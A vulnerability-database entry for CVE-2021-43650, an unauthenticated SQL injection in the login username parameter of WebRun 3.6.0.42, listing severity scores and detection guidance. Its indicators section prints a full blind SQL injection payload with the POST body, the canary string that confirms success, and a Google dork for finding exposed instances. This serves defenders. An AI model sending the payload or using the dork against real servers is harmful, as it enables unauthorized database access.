cbcvebase.
CVE-2021-43650
published 2022-03-22

CVE-2021-43650: WebRun 3.6.0.42 is vulnerable to SQL Injection via the P_0 parameter used to set the username during the login process.

PriorityP264critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
6.16%
92.6th percentile
WebRun 3.6.0.42 is vulnerable to SQL Injection via the P_0 parameter used to set the username during the login process.

Affected

1 ranges
VendorProductVersion rangeFixed in
softwellwebrun

Detection & IOCsextracted from sources · hover to see the quote

otherP_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd
commandaction=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd
otherqvvxq1qbzbq
  • Monitor POST requests to the login endpoint for SQL injection patterns in the P_0 parameter, specifically CAST/CHR-based blind SQLi payloads targeting a PostgreSQL backend.
  • Alert on POST body containing 'action=executeRule' combined with 'ruleName=GES_FLX_Gerar+Token+Dashboard' and SQL metacharacters in P_0, as this is the specific rule endpoint abused during exploitation.
  • Detect the canary string 'qvvxq1qbzbq' in HTTP responses, which confirms successful exploitation of the PostgreSQL CAST-based error injection.
  • Use the Google Dork 'intitle:"Webrun 3.6.0.42"' to identify exposed vulnerable instances for asset inventory and attack surface reduction.
  • ·The vulnerable parameter P_0 is submitted via POST body (not URL query string); network inspection rules must inspect POST body content to detect this attack.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.